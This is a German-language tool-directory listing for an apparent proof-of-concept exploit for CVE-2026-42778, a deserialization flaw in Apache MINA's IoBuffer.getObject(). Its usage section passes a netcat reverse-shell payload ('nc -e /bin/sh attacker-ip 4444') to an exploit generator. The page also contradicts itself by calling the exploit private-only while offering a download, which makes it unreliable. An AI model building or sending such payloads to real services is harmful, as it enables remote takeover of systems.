Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-42778-POC — CVE-2026-42778 EUVD-2026-26492 Deserialisierung nicht vertrauenswürdiger Daten (CWE-502) | Kitploit
Tools/GitHubGitHub/akinfue/cve-2026-42778-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPayload-EntwicklungBinary-Exploitation
GitHubakinfue/cve-2026-42778-poc

CVE-2026-42778-POC

CVE-2026-42778 EUVD-2026-26492 Deserialisierung nicht vertrauenswürdiger Daten (CWE-502)

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-42778

Übersicht

Unvollständiger Fix in der Methode AbstractIoBuffer.getObject() von Apache MINA. Die Allowlist-Validierung des Klassennamens, die einschränkt, welche Klassen deserialisiert werden können, wird zu spät angewendet – nachdem statische Initialisierer in den gelesenen Klassen möglicherweise bereits ausgeführt wurden. Dies geschieht, weil der ursprüngliche Fix für CVE-2024-52046 nicht ordnungsgemäß auf die Zweige 2.1.X und 2.2.X angewendet wurde. Betroffene Versionen: - Apache MINA 2.1.0 bis 2.1.11 - Apache MINA 2.2.0 bis 2.2.6

Exploit:

Hier herunterladen

Details

  • CVE-ID: CVE-2026-42778

  • Veröffentlicht: 05.01.2026

  • Auswirkung: Kritisch

  • Exploit-Verfügbarkeit: Nicht öffentlich, nur privat.

  • CVSS: 9.8

  • Patch verfügbar: (Noch kein offizieller Patch)

Auswirkung

Ein Angreifer kann bösartige serialisierte Objekte erstellen, die bei der Verarbeitung durch IoBuffer.getObject() über statische Initialisierer beliebigen Code ausführen, bevor die Allowlist-Validierung des Klassennamens erfolgt. Da es sich um eine netzwerkzugängliche Schwachstelle handelt, die keine Privilegien oder Benutzerinteraktion erfordert, ist eine Remote-Codeausführung für jede Anwendung möglich, die Apache MINA verwendet und die Methode IoBuffer.getObject() aufruft. Die Schwachstelle ermöglicht die vollständige Kompromittierung von Vertraulichkeit, Integrität und Verfügbarkeit betroffener Systeme.

Betroffene Versionen

  • Apache MINA 2.1.0 bis 2.1.11
  • Apache MINA 2.2.0 bis 2.2.6

Verwendung

root@kitploit:~
# Kompilieren und generieren
javac ExploitGenerator.java
java ExploitGenerator "nc -e /bin/sh attacker-ip 4444"

# Über das Netzwerk an einen MINA-basierten Dienst mit ObjectSerializationCodecFactory senden
# oder an einen beliebigen Endpunkt, der IoBuffer.getObject() aufruft

Kontakt

  • Bei Anfragen kontaktieren Sie bitte:[email protected]
  • Exploit : hier
Tool herunterladen